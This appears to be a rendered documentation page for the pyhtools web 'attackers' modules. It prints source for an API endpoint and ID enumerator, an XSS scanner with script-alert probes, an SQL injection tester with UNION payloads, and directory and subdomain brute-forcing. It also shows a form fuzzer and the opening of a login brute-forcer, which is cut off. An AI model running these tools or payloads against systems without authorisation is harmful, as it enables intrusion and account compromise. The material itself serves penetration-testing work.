Skip to content

Web Attackers Documentation

API

APIdiscover

Class to discover API endpoints

Source code in pyhtools\attackers\web\api\discover.py
class APIdiscover:
    '''
    Class to discover API endpoints
    '''
    def __init__(self, base_url: str, match_codes: list[int], rate_limit: int = 20, delay: float = 0.05, output_file_path: str = None, headers: dict = None) -> None:
        '''APIdiscover constructor

        Args:
            base_url (str): weburl of API  
            match_codes (list): list of integer containing HTTP response status codes, which detects that endpoint exists
            rate_limit (int): number of concurrent requests at the same time
            delay (float): delay between consecutive requests
            output_file_path (str): file path to store results in json format
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        assert isinstance(base_url, str)
        assert isinstance(match_codes, list)
        assert isinstance(rate_limit, int)
        assert isinstance(delay, float)

        self.base_url = base_url
        self.output_file_path = output_file_path
        self.match_codes = match_codes
        self._delay = delay
        self._semaphore = asyncio.Semaphore(rate_limit)
        self._headers = headers

    async def check_endpoint(self, endpoint: str) -> dict:
        '''checks if endpoint is valid or not using HTTP Get request
        returns dict containing endpoint information

        Args: 
            endpoint(str): api endpoint

        Returns: 
            dict: contains HTTP request and response data
        '''
        assert isinstance(endpoint, str)

        url = urljoin(self.base_url, endpoint)
        async with self._semaphore:
            async with ClientSession(headers=self._headers) as session:
                async with session.get(url) as response:
                    if response.status in self.match_codes:
                        logger.info(f'{endpoint}\t{response.status}')

                    logger.debug(f'{url}\t{response.status}')

                    await asyncio.sleep(self._delay)
                    return {
                        "endpoint": endpoint,
                        "status": response.status,
                        "req_url": str(response.request_info.real_url),
                        "req_method": response.request_info.method,
                        "req_headers": dict(**response.request_info.headers),
                        "res_redirection": str(response.history),
                        "res_headers": dict(response.headers),
                        "res_body": (await response.read()).decode('utf-8'),
                    }

    async def get_endpoints_from_file(self, wordlist_path: str):
        '''reads endpoints from wordlist file and returns as a list

        Args:
            wordlist_path (str): path of wordlist file

        Returns:
            list: list of str containing endpoints
        '''
        assert isinstance(wordlist_path, str) and isfile(wordlist_path)

        endpoints = None
        with open(wordlist_path, 'r') as f:
            endpoints = [str(endpoint).strip() for endpoint in f.readlines()]

        return endpoints

    async def save_result_to_file(self, results: list[dict], file_path: str,):
        '''stores json result to file

        Args:
            file_path (str): path to output file
            results (list): list of HTTP response (dict) 

        Returns:
            bool: returns True if file was saved else False in case 
            of any exception
        '''
        assert isinstance(results, list)
        assert isinstance(file_path, str)

        save_status = False
        with open(file_path, 'w') as f:
            try:
                f.write(to_json(results))
                save_status = True
                logger.info(f'results stored in {file_path}')
            except JSONDecodeError:
                logger.error(
                    f'Invalid json data, Failed to store data in {file_path}')

        return save_status

    async def start_enum_from_file(self, wordlist_file: str):
        '''
        start endpoint enumeration using wordlist

        Args:
            wordlist_file(str): path of wordlist file

        Returns:
            None
        '''
        endpoints = await self.get_endpoints_from_file(wordlist_file)

        results = await self.enumerate(endpoints=endpoints)

        if self.output_file_path:
            await self.save_result_to_file(
                results=results,
                file_path=self.output_file_path,
            )

    async def start_enum_id(self, ending_id: int, param_name: str, starting_id: int = 0):
        '''starts enumeration based on id in GET request

        Args:
            ending_id (int): object id after which enumeration should stop
            param_name (str): GET param
            starting_id (int): object id from which enumeration should start

        Returns:
            None
        '''
        assert isinstance(starting_id, int)
        assert isinstance(ending_id, int)
        assert isinstance(param_name, str)

        endpoints = [f'{self.base_url}{param_name}={id_val}' for id_val in range(starting_id, ending_id)]

        results = await self.enumerate(endpoints=endpoints)

        if self.output_file_path:
            await self.save_result_to_file(
                results=results,
                file_path=self.output_file_path,
            )

    async def enumerate(self, endpoints: list):
        '''start API enumeration and return captured responses as list

        Args:
            endpoints (list): contains list of endpoints as str

        Returns:
            results (list): list of results containing dict of 
            endpoint information
        '''
        assert isinstance(endpoints, list)

        tasks = []
        for endpoint in endpoints:
            tasks.append(
                asyncio.ensure_future(
                    self.check_endpoint(endpoint=endpoint)
                )
            )

        results = await asyncio.gather(*tasks)
        return results

__init__(base_url, match_codes, rate_limit=20, delay=0.05, output_file_path=None, headers=None)

APIdiscover constructor

Parameters:

Name Type Description Default
base_url str

weburl of API

required
match_codes list

list of integer containing HTTP response status codes, which detects that endpoint exists

required
rate_limit int

number of concurrent requests at the same time

20
delay float

delay between consecutive requests

0.05
output_file_path str

file path to store results in json format

None
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\api\discover.py
def __init__(self, base_url: str, match_codes: list[int], rate_limit: int = 20, delay: float = 0.05, output_file_path: str = None, headers: dict = None) -> None:
    '''APIdiscover constructor

    Args:
        base_url (str): weburl of API  
        match_codes (list): list of integer containing HTTP response status codes, which detects that endpoint exists
        rate_limit (int): number of concurrent requests at the same time
        delay (float): delay between consecutive requests
        output_file_path (str): file path to store results in json format
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    assert isinstance(base_url, str)
    assert isinstance(match_codes, list)
    assert isinstance(rate_limit, int)
    assert isinstance(delay, float)

    self.base_url = base_url
    self.output_file_path = output_file_path
    self.match_codes = match_codes
    self._delay = delay
    self._semaphore = asyncio.Semaphore(rate_limit)
    self._headers = headers

check_endpoint(endpoint) async

checks if endpoint is valid or not using HTTP Get request returns dict containing endpoint information

Parameters:

Name Type Description Default
endpoint(str)

api endpoint

required

Returns:

Name Type Description
dict dict

contains HTTP request and response data

Source code in pyhtools\attackers\web\api\discover.py
async def check_endpoint(self, endpoint: str) -> dict:
    '''checks if endpoint is valid or not using HTTP Get request
    returns dict containing endpoint information

    Args: 
        endpoint(str): api endpoint

    Returns: 
        dict: contains HTTP request and response data
    '''
    assert isinstance(endpoint, str)

    url = urljoin(self.base_url, endpoint)
    async with self._semaphore:
        async with ClientSession(headers=self._headers) as session:
            async with session.get(url) as response:
                if response.status in self.match_codes:
                    logger.info(f'{endpoint}\t{response.status}')

                logger.debug(f'{url}\t{response.status}')

                await asyncio.sleep(self._delay)
                return {
                    "endpoint": endpoint,
                    "status": response.status,
                    "req_url": str(response.request_info.real_url),
                    "req_method": response.request_info.method,
                    "req_headers": dict(**response.request_info.headers),
                    "res_redirection": str(response.history),
                    "res_headers": dict(response.headers),
                    "res_body": (await response.read()).decode('utf-8'),
                }

enumerate(endpoints) async

start API enumeration and return captured responses as list

Parameters:

Name Type Description Default
endpoints list

contains list of endpoints as str

required

Returns:

Name Type Description
results list

list of results containing dict of

endpoint information

Source code in pyhtools\attackers\web\api\discover.py
async def enumerate(self, endpoints: list):
    '''start API enumeration and return captured responses as list

    Args:
        endpoints (list): contains list of endpoints as str

    Returns:
        results (list): list of results containing dict of 
        endpoint information
    '''
    assert isinstance(endpoints, list)

    tasks = []
    for endpoint in endpoints:
        tasks.append(
            asyncio.ensure_future(
                self.check_endpoint(endpoint=endpoint)
            )
        )

    results = await asyncio.gather(*tasks)
    return results

get_endpoints_from_file(wordlist_path) async

reads endpoints from wordlist file and returns as a list

Parameters:

Name Type Description Default
wordlist_path str

path of wordlist file

required

Returns:

Name Type Description
list

list of str containing endpoints

Source code in pyhtools\attackers\web\api\discover.py
async def get_endpoints_from_file(self, wordlist_path: str):
    '''reads endpoints from wordlist file and returns as a list

    Args:
        wordlist_path (str): path of wordlist file

    Returns:
        list: list of str containing endpoints
    '''
    assert isinstance(wordlist_path, str) and isfile(wordlist_path)

    endpoints = None
    with open(wordlist_path, 'r') as f:
        endpoints = [str(endpoint).strip() for endpoint in f.readlines()]

    return endpoints

save_result_to_file(results, file_path) async

stores json result to file

Parameters:

Name Type Description Default
file_path str

path to output file

required
results list

list of HTTP response (dict)

required

Returns:

Name Type Description
bool

returns True if file was saved else False in case

of any exception

Source code in pyhtools\attackers\web\api\discover.py
async def save_result_to_file(self, results: list[dict], file_path: str,):
    '''stores json result to file

    Args:
        file_path (str): path to output file
        results (list): list of HTTP response (dict) 

    Returns:
        bool: returns True if file was saved else False in case 
        of any exception
    '''
    assert isinstance(results, list)
    assert isinstance(file_path, str)

    save_status = False
    with open(file_path, 'w') as f:
        try:
            f.write(to_json(results))
            save_status = True
            logger.info(f'results stored in {file_path}')
        except JSONDecodeError:
            logger.error(
                f'Invalid json data, Failed to store data in {file_path}')

    return save_status

start_enum_from_file(wordlist_file) async

start endpoint enumeration using wordlist

Parameters:

Name Type Description Default
wordlist_file(str)

path of wordlist file

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\api\discover.py
async def start_enum_from_file(self, wordlist_file: str):
    '''
    start endpoint enumeration using wordlist

    Args:
        wordlist_file(str): path of wordlist file

    Returns:
        None
    '''
    endpoints = await self.get_endpoints_from_file(wordlist_file)

    results = await self.enumerate(endpoints=endpoints)

    if self.output_file_path:
        await self.save_result_to_file(
            results=results,
            file_path=self.output_file_path,
        )

start_enum_id(ending_id, param_name, starting_id=0) async

starts enumeration based on id in GET request

Parameters:

Name Type Description Default
ending_id int

object id after which enumeration should stop

required
param_name str

GET param

required
starting_id int

object id from which enumeration should start

0

Returns:

Type Description

None

Source code in pyhtools\attackers\web\api\discover.py
async def start_enum_id(self, ending_id: int, param_name: str, starting_id: int = 0):
    '''starts enumeration based on id in GET request

    Args:
        ending_id (int): object id after which enumeration should stop
        param_name (str): GET param
        starting_id (int): object id from which enumeration should start

    Returns:
        None
    '''
    assert isinstance(starting_id, int)
    assert isinstance(ending_id, int)
    assert isinstance(param_name, str)

    endpoints = [f'{self.base_url}{param_name}={id_val}' for id_val in range(starting_id, ending_id)]

    results = await self.enumerate(endpoints=endpoints)

    if self.output_file_path:
        await self.save_result_to_file(
            results=results,
            file_path=self.output_file_path,
        )

Vuln Scanner

Scanner

Scans for vulnerabilities in the website

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
class Scanner:
    '''Scans for vulnerabilities in the website'''
    def __init__(self, url:str, ignore_links:list) -> None:

        self.target_url = url

        if ignore_links:
            self.ignore_links = ignore_links
        else:
            self.ignore_links = []

        self.session = requests.Session()
        self.target_links = []


    def get_links(self, url:str)->list:
        '''extracts links from the whole webpage.
        Args:
            url (str): URL of the webpage

        Returns: 
            links (list): list of URLs present in the webpage
        '''
        response = self.session.get(url)
        content = str(response.content)
        return re.findall(r'(?:href=")(.*?)"',content)


    def get_target_links(self, url:str):
        '''extracts useful links and prints them which are
        only related to the target webpage.

        Args:
            links (list):  list of links from the target webpage

        Returns:
            list: useful links as str related to target webpage
        '''
        links = self.get_links(url)
        for link in links:
            link = urljoin(url, link)

            if '#' in link:
                link = link.split('#')[0]

            if link not in self.target_links and self.target_url in link and link not in self.ignore_links:
                self.target_links.append(link)
                if requests.get(link).status_code==200:
                    print(link)
                self.get_target_links(link)


    def remove_escape_seq(self, content:str)->str:
        r'''removes \r \t \n from the html parsed content if present.

        Args: 
            content (str): html page content as string

        Returns: 
            str: escaped html content without \r \t \n chars
        '''
        return content.replace(r'\n','').replace(r'\t','').replace(r'\r','').replace(r"\'","'")


    def get_page_content(self, url:str)->str:
        '''extracts html code of the webpage

        Args:
            url (str): URL of the webpage

        Returns:
            str: Html content as string
        '''
        response = self.session.get(url)
        content = str(response.content)
        content = self.remove_escape_seq(content)
        return content


    def get_forms(self, url:str)->list:
        '''extracts all the forms on the url 
        webpage using beautiful soup 4

        Args:
            url (str): URL of webpage

        Returns: 
            list: list of forms (bs4.element.ResultSet)
        ''' 
        page_content = self.get_page_content(url)
        page_content = self.remove_escape_seq(page_content)
        page_html = BeautifulSoup(page_content,'html.parser')
        return page_html.find_all(name='form')


    def submit_form(self, form, value, url):
        '''submits form with passed value to url passed

        Args: 
            form (dict): webpage form from bs4.element.ResultSet
            value (str): Form input value to be used while filling form
            url (str): base url of webpage

        Returns: 
            str: html contents of the reponse
        '''
        action = form.get('action')
        post_url = urljoin(url, action)
        # print(post_url)

        method = form.get('method')
        post_data_dict = {}

        inputs = form.find_all('input')
        for input in inputs:
            inp_name = input.get('name') 
            inp_type = input.get('type')
            inp_value = input.get('value')

            if inp_type == 'text':
                inp_value = value

            post_data_dict[inp_name]=inp_value

        if method == 'post':
            post_response = self.session.post(url=post_url, data=post_data_dict)
        else:
            post_response = self.session.get(url=url, params=post_data_dict)

        return self.remove_escape_seq(str(post_response.content))


    def is_xss_vulnerable_in_form(self, form, url)->bool:
        '''tests whether the passed form is xss vulnerable or not. 

        Args:
            form (dict): webpage form from bs4.element.ResultSet
            url (str): base url of webpage

        Returns: 
            bool: returns True if vulnerable else False
        '''
        test_script_payload = "<scRipt>alert('vulnerable')</sCript>"
        response_content = self.submit_form(form, test_script_payload, url)
        # response = BeautifulSoup(response_content, 'html.parser')
        # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())
        return test_script_payload in response_content


    def is_xss_vulnerable_in_link(self, url, payload=None):
        '''tests whether the passed url is xss vulnerable or not. 

        Args:
            url (str): base url of webpage
            payload (str): XSS payload to be injected in URL during test

        Returns: 
            bool: returns True if vulnerable else False
        '''
        if payload is None:
            payload = "<scRipt>alert('vulnerable')</sCript>"
        url = url.replace('=',f'={payload}')
        response_content = self.get_page_content(url)
        # response = BeautifulSoup(response_content, 'html.parser')
        # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())

        return payload in response_content


    def run(self):
        '''Starts the scanner

        Args:
            None

        Returns: 
            None
        '''
        try:
            try:
                print(BRIGHT_WHITE + '[*] Spider is mapping website.')
                print(BRIGHT_YELLOW + '[!] Press ctrl+c to stop mapping!')
                self.get_target_links(self.target_url)
            except KeyboardInterrupt:
                print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! Stopping Spider. Website mapping stopped.')

            print(BRIGHT_WHITE + '[*] Finding vulnerabilites on the mapped webpages.')
            forms = self.get_forms(self.target_url)

            for link in self.target_links:
                forms = self.get_forms(link)
                for form in forms:
                    print(BRIGHT_WHITE + '[*] Scanning/Testing vuln in form of link: ', link)
                    if self.is_xss_vulnerable_in_form(form,link):
                        print(BRIGHT_YELLOW + f'[!] Found XSS vuln in {link} form : ')
                        print(form)
                        print()

                if "=" in link:
                    print(BRIGHT_WHITE + '[*] Scanning/Testing vuln from URL of link: ', link)
                    if self.is_xss_vulnerable_in_link(link):
                        print(BRIGHT_YELLOW + '[!] Found XSS vuln in URL :', link)
                        print()
        except Exception as e:
            print(BRIGHT_RED + f'[-] Exception : {e}')

get_forms(url)

extracts all the forms on the url webpage using beautiful soup 4

Parameters:

Name Type Description Default
url str

URL of webpage

required

Returns:

Name Type Description
list list

list of forms (bs4.element.ResultSet)

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_forms(self, url:str)->list:
    '''extracts all the forms on the url 
    webpage using beautiful soup 4

    Args:
        url (str): URL of webpage

    Returns: 
        list: list of forms (bs4.element.ResultSet)
    ''' 
    page_content = self.get_page_content(url)
    page_content = self.remove_escape_seq(page_content)
    page_html = BeautifulSoup(page_content,'html.parser')
    return page_html.find_all(name='form')

extracts links from the whole webpage.

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
links list

list of URLs present in the webpage

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_links(self, url:str)->list:
    '''extracts links from the whole webpage.
    Args:
        url (str): URL of the webpage

    Returns: 
        links (list): list of URLs present in the webpage
    '''
    response = self.session.get(url)
    content = str(response.content)
    return re.findall(r'(?:href=")(.*?)"',content)

get_page_content(url)

extracts html code of the webpage

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
str str

Html content as string

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_page_content(self, url:str)->str:
    '''extracts html code of the webpage

    Args:
        url (str): URL of the webpage

    Returns:
        str: Html content as string
    '''
    response = self.session.get(url)
    content = str(response.content)
    content = self.remove_escape_seq(content)
    return content

extracts useful links and prints them which are only related to the target webpage.

Parameters:

Name Type Description Default
links list

list of links from the target webpage

required

Returns:

Name Type Description
list

useful links as str related to target webpage

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_target_links(self, url:str):
    '''extracts useful links and prints them which are
    only related to the target webpage.

    Args:
        links (list):  list of links from the target webpage

    Returns:
        list: useful links as str related to target webpage
    '''
    links = self.get_links(url)
    for link in links:
        link = urljoin(url, link)

        if '#' in link:
            link = link.split('#')[0]

        if link not in self.target_links and self.target_url in link and link not in self.ignore_links:
            self.target_links.append(link)
            if requests.get(link).status_code==200:
                print(link)
            self.get_target_links(link)

is_xss_vulnerable_in_form(form, url)

tests whether the passed form is xss vulnerable or not.

Parameters:

Name Type Description Default
form dict

webpage form from bs4.element.ResultSet

required
url str

base url of webpage

required

Returns:

Name Type Description
bool bool

returns True if vulnerable else False

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def is_xss_vulnerable_in_form(self, form, url)->bool:
    '''tests whether the passed form is xss vulnerable or not. 

    Args:
        form (dict): webpage form from bs4.element.ResultSet
        url (str): base url of webpage

    Returns: 
        bool: returns True if vulnerable else False
    '''
    test_script_payload = "<scRipt>alert('vulnerable')</sCript>"
    response_content = self.submit_form(form, test_script_payload, url)
    # response = BeautifulSoup(response_content, 'html.parser')
    # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())
    return test_script_payload in response_content

tests whether the passed url is xss vulnerable or not.

Parameters:

Name Type Description Default
url str

base url of webpage

required
payload str

XSS payload to be injected in URL during test

None

Returns:

Name Type Description
bool

returns True if vulnerable else False

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def is_xss_vulnerable_in_link(self, url, payload=None):
    '''tests whether the passed url is xss vulnerable or not. 

    Args:
        url (str): base url of webpage
        payload (str): XSS payload to be injected in URL during test

    Returns: 
        bool: returns True if vulnerable else False
    '''
    if payload is None:
        payload = "<scRipt>alert('vulnerable')</sCript>"
    url = url.replace('=',f'={payload}')
    response_content = self.get_page_content(url)
    # response = BeautifulSoup(response_content, 'html.parser')
    # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())

    return payload in response_content

remove_escape_seq(content)

removes \r \t \n from the html parsed content if present.

Parameters:

Name Type Description Default
content str

html page content as string

required

Returns:

Name Type Description
str str

escaped html content without \r \t \n chars

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def remove_escape_seq(self, content:str)->str:
    r'''removes \r \t \n from the html parsed content if present.

    Args: 
        content (str): html page content as string

    Returns: 
        str: escaped html content without \r \t \n chars
    '''
    return content.replace(r'\n','').replace(r'\t','').replace(r'\r','').replace(r"\'","'")

run()

Starts the scanner

Returns:

Type Description

None

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def run(self):
    '''Starts the scanner

    Args:
        None

    Returns: 
        None
    '''
    try:
        try:
            print(BRIGHT_WHITE + '[*] Spider is mapping website.')
            print(BRIGHT_YELLOW + '[!] Press ctrl+c to stop mapping!')
            self.get_target_links(self.target_url)
        except KeyboardInterrupt:
            print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! Stopping Spider. Website mapping stopped.')

        print(BRIGHT_WHITE + '[*] Finding vulnerabilites on the mapped webpages.')
        forms = self.get_forms(self.target_url)

        for link in self.target_links:
            forms = self.get_forms(link)
            for form in forms:
                print(BRIGHT_WHITE + '[*] Scanning/Testing vuln in form of link: ', link)
                if self.is_xss_vulnerable_in_form(form,link):
                    print(BRIGHT_YELLOW + f'[!] Found XSS vuln in {link} form : ')
                    print(form)
                    print()

            if "=" in link:
                print(BRIGHT_WHITE + '[*] Scanning/Testing vuln from URL of link: ', link)
                if self.is_xss_vulnerable_in_link(link):
                    print(BRIGHT_YELLOW + '[!] Found XSS vuln in URL :', link)
                    print()
    except Exception as e:
        print(BRIGHT_RED + f'[-] Exception : {e}')

submit_form(form, value, url)

submits form with passed value to url passed

Parameters:

Name Type Description Default
form dict

webpage form from bs4.element.ResultSet

required
value str

Form input value to be used while filling form

required
url str

base url of webpage

required

Returns:

Name Type Description
str

html contents of the reponse

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def submit_form(self, form, value, url):
    '''submits form with passed value to url passed

    Args: 
        form (dict): webpage form from bs4.element.ResultSet
        value (str): Form input value to be used while filling form
        url (str): base url of webpage

    Returns: 
        str: html contents of the reponse
    '''
    action = form.get('action')
    post_url = urljoin(url, action)
    # print(post_url)

    method = form.get('method')
    post_data_dict = {}

    inputs = form.find_all('input')
    for input in inputs:
        inp_name = input.get('name') 
        inp_type = input.get('type')
        inp_value = input.get('value')

        if inp_type == 'text':
            inp_value = value

        post_data_dict[inp_name]=inp_value

    if method == 'post':
        post_response = self.session.post(url=post_url, data=post_data_dict)
    else:
        post_response = self.session.get(url=url, params=post_data_dict)

    return self.remove_escape_seq(str(post_response.content))

Module: sqli.py Author: dmdhrumilmistry Project: github.com/dmdhrumilmistry/pyhtools License: MIT

enumerate_tests(url)

tests application for various SQL injection methods

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def enumerate_tests(url):
    '''tests application for various SQL injection methods

    Args: 
        url (str): url of the target

    Returns: 
        None
    '''
    vuln_links = 0
    sqli_payloads = ["'", "'--",
                     "' UNION SELECT NULL--", "' UNION ORDER BY 1--"]

    for payload in sqli_payloads:
        payload_url = url + payload

        if is_vulnerable(payload_url):
            print(f'[URL] "{payload_url}"')
            print(f'[PAYLOAD] {payload}')
            print('-'*40)
            vuln_links += 1

    print(f'[VULN] {vuln_links} total vulnerable links found')

is_url_valid(url)

checks if url is valid

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Name Type Description
bool bool

returns True if url is valid else False

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def is_url_valid(url: str) -> bool:
    '''checks if url is valid

    Args: 
        url (str): url of the target

    Returns:
        bool: returns True if url is valid else False
    '''
    is_valid = False
    if 'http://' in url or 'https://' in url:
        is_valid = True

    if len(url.split('?')[-1]) == 0:
        is_valid = False

    return is_valid

is_vulnerable(url)

tests whether app is vulnerable to the url

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Name Type Description
bool bool

returns True if vulnerable else returns False

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def is_vulnerable(url: str) -> bool:
    '''tests whether app is vulnerable to the url

    Args: 
        url (str): url of the target

    Returns: 
        bool: returns True if vulnerable else returns False
    '''
    response = get(url=url)
    content = response.content.lower()

    if response.status_code not in (200, 404) or b'error' in content or b'on line' in content or b'at line' in content:
        return True

    return False

get_args()

get arguments from the user and return as dict containing target_url, ignore_links, login_link, and login_details

Returns:

Name Type Description
dict

user arguments

Source code in pyhtools\attackers\web\vuln_scanner\__main__.py
def get_args():
    '''get arguments from the user and return as dict containing
    target_url, ignore_links, login_link, and login_details

    Args:
        None

    Returns:
        dict: user arguments
    '''
    parser = argparse.ArgumentParser(description='Web Application Vulnerability Scanner')
    parser.add_argument('-t', '--target-url',dest='target_url',help='root url of the target website', required=True)
    parser.add_argument('-ig', '--ignore-links', dest='ignore_links', help='url of wepages which are to be ignored while scanning/testing for vulnerabilities separated by commas')
    parser.add_argument('-l','--login-link',dest='login_link',help='direct login/authentication link')
    parser.add_argument('-ld', '--login-details', dest='login_details', help='pass login details if authentication required as username,password (separated by comma)')
    args = parser.parse_args()


    if args.target_url:
        target_url = args.target_url

    login_link = None
    if args.login_link:
        login_link = args.login_link

    login_details = None
    if args.login_details is not None:
        login_details = [detail.strip() for detail in args.login_details.split(',')]

    ignore_links = None
    if args.ignore_links is not None:
        ignore_links = [link.strip() for link in args.ignore_links.split(',')]

    return {
        "target_url": target_url,
        "ignore_links": ignore_links,
        "login_link": login_link,
        "login_details" : login_details,
    }

Enumerate

Discoverer

Discoverer can be used to enumerate directories and subdomains of target website.

Source code in pyhtools\attackers\web\enumerate.py
class Discoverer:
    '''
    Discoverer can be used to enumerate directories and subdomains of target website.
    '''

    def __init__(self, *args, **kwargs) -> None:
        self._requester = AsyncRLRequests(*args, **kwargs)

    async def _filter_request(self, url: str, status_codes: list[int] = [200, 403, 500]):
        '''prints url if reponse status code matches code from status_codes.

        Args:
            url (str): URL of website   
            status_codes (list): list of integer containing HTTP response  
            status codes, which detects that directory/subdomain exists

        Returns:
            None
        '''
        response = await self._requester.request(url=url)

        if isinstance(response, dict) and response.get('status') in status_codes:
            print(url, response.get('status'))

    async def check_dirs(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
        '''enumerate website directories

        Args:
            domain (str): domain of the target
            wordlist_path (str): path of wordlist file
            status_codes (list): list of integer containing HTTP response  
            status codes, which detects that directory exists

        Returns:
            None
        '''
        if not domain.endswith('/'):
            domain += '/'
        if not domain.startswith('https://') or domain.startswith('http://'):
            domain = f'http://{domain}'

        dirs = read_file_lines(wordlist_path)

        tasks = []
        for dir in dirs:
            link = urljoin(domain, dir)
            tasks.append(
                ensure_future(
                    self._filter_request(link, status_codes)
                )
            )

        await gather(*tasks)

    async def check_subdomains(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
        '''enumerate website subdomains

        Args:
            domain (str): domain of the target
            wordlist_path (str): path of wordlist file
            status_codes (list): list of integer containing HTTP response  
            status codes, which detects that directory exists

        Returns:
            None
        '''
        domain = domain.replace('https://', '').replace('http://', '')
        subdomains = read_file_lines(wordlist_path)

        tasks = []
        for subdomain in subdomains:
            url = f'http://{subdomain}.{domain}'
            tasks.append(
                ensure_future(
                    self._filter_request(url, status_codes)
                )
            )

        await gather(*tasks)

check_dirs(domain, wordlist_path, status_codes=[200, 403, 500]) async

enumerate website directories

Parameters:

Name Type Description Default
domain str

domain of the target

required
wordlist_path str

path of wordlist file

required
status_codes list

list of integer containing HTTP response

[200, 403, 500]

Returns:

Type Description

None

Source code in pyhtools\attackers\web\enumerate.py
async def check_dirs(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
    '''enumerate website directories

    Args:
        domain (str): domain of the target
        wordlist_path (str): path of wordlist file
        status_codes (list): list of integer containing HTTP response  
        status codes, which detects that directory exists

    Returns:
        None
    '''
    if not domain.endswith('/'):
        domain += '/'
    if not domain.startswith('https://') or domain.startswith('http://'):
        domain = f'http://{domain}'

    dirs = read_file_lines(wordlist_path)

    tasks = []
    for dir in dirs:
        link = urljoin(domain, dir)
        tasks.append(
            ensure_future(
                self._filter_request(link, status_codes)
            )
        )

    await gather(*tasks)

check_subdomains(domain, wordlist_path, status_codes=[200, 403, 500]) async

enumerate website subdomains

Parameters:

Name Type Description Default
domain str

domain of the target

required
wordlist_path str

path of wordlist file

required
status_codes list

list of integer containing HTTP response

[200, 403, 500]

Returns:

Type Description

None

Source code in pyhtools\attackers\web\enumerate.py
async def check_subdomains(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
    '''enumerate website subdomains

    Args:
        domain (str): domain of the target
        wordlist_path (str): path of wordlist file
        status_codes (list): list of integer containing HTTP response  
        status codes, which detects that directory exists

    Returns:
        None
    '''
    domain = domain.replace('https://', '').replace('http://', '')
    subdomains = read_file_lines(wordlist_path)

    tasks = []
    for subdomain in subdomains:
        url = f'http://{subdomain}.{domain}'
        tasks.append(
            ensure_future(
                self._filter_request(url, status_codes)
            )
        )

    await gather(*tasks)

Get Forms

fuzz_forms(target_url)

get forms from html page, send post request and return html response

Parameters:

Name Type Description Default
target_url str

webpage URL containing forms

required

Returns:

Name Type Description
str

returns html content of page after sending fuzzed form request

Source code in pyhtools\attackers\web\get_forms.py
def fuzz_forms(target_url:str):
    '''get forms from html page, send post request and return html response 

    Args: 
        target_url (str): webpage URL containing forms

    Returns: 
        str: returns html content of page after sending fuzzed form request
    '''
    page_content = get_page_content(target_url)

    # remove\r \t \n from the page content
    page_content = remove_escape_seq(page_content)

    page_html = BeautifulSoup(page_content,'html.parser')
    forms = page_html.find_all(name='form')
    for form in forms:
        action = form.get('action')
        post_url = urljoin(target_url, action)
        # print(post_url)

        # method = form.get('method')

        post_data_dict = {}
        inputs = form.find_all('input')
        for input in inputs:
            inp_name = input.get('name') 
            inp_type = input.get('type')
            inp_value = input.get('value')

            if inp_type == 'text':
                inp_value = 'pyhtools-form-test'

            elif inp_type == 'password':
                inp_value = 'pyhtools-P#$$Wd!!!'

            post_data_dict[inp_name]=inp_value

        post_response = requests.post(url=post_url, data=post_data_dict)
        post_response_content = remove_escape_seq(str(post_response.content))
        post_content = BeautifulSoup(post_response_content, 'html.parser')

        return str(post_content.prettify())

get_page_content(url)

extracts html code of the webpage

Parameters:

Name Type Description Default
url str

webpage URL

required

Returns:

Name Type Description
str

HTML content of the webpage

Source code in pyhtools\attackers\web\get_forms.py
def get_page_content(url:str):
    '''extracts html code of the webpage 

    Args: 
        url (str): webpage URL

    Returns: 
        str: HTML content of the webpage
    '''
    response = requests.get(url)
    content = str(response.content)
    content = remove_escape_seq(content)
    return content

remove_escape_seq(content)

removes

from the html parsed content if present.

Args: content (str): html content of webpage

Returns: str: returns escaped html code

Source code in pyhtools\attackers\web\get_forms.py
def remove_escape_seq(content:str)->str:
    '''removes \r \t \n from the html parsed content if present.

    Args: 
        content (str): html content of webpage

    Returns: 
        str: returns escaped html code
    '''
    return content.replace(r'\n','').replace(r'\t','').replace(r'\r','')

Login Guesser

bruteforce_login(target_url, wordlist_file, post_values)

Bruteforces login requests on a website

Parameters:

Name Type Description Default
target_url str

URL of login page

required
wordlist_file str

path of wordlist file

required
post_values dict

dict containing key value pairs of POST data

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\login_guesser.py
def bruteforce_login(target_url:str, wordlist_file:str, post_values:dict):
    '''Bruteforces login requests on a website

    Args:
        target_url (str): URL of login page
        wordlist_file (str): path of wordlist file
        post_values (dict): dict containing key value pairs of POST data

    Returns:
        None
    '''
    # tested on DVWA web app.
    # target_url = "http://10.0.2.30/dvwa/login.php"
    # wordlist_file = "full_path_to_wordlist"
    # post_values = {"username":"admin", "password":"", "Login":"submit"}

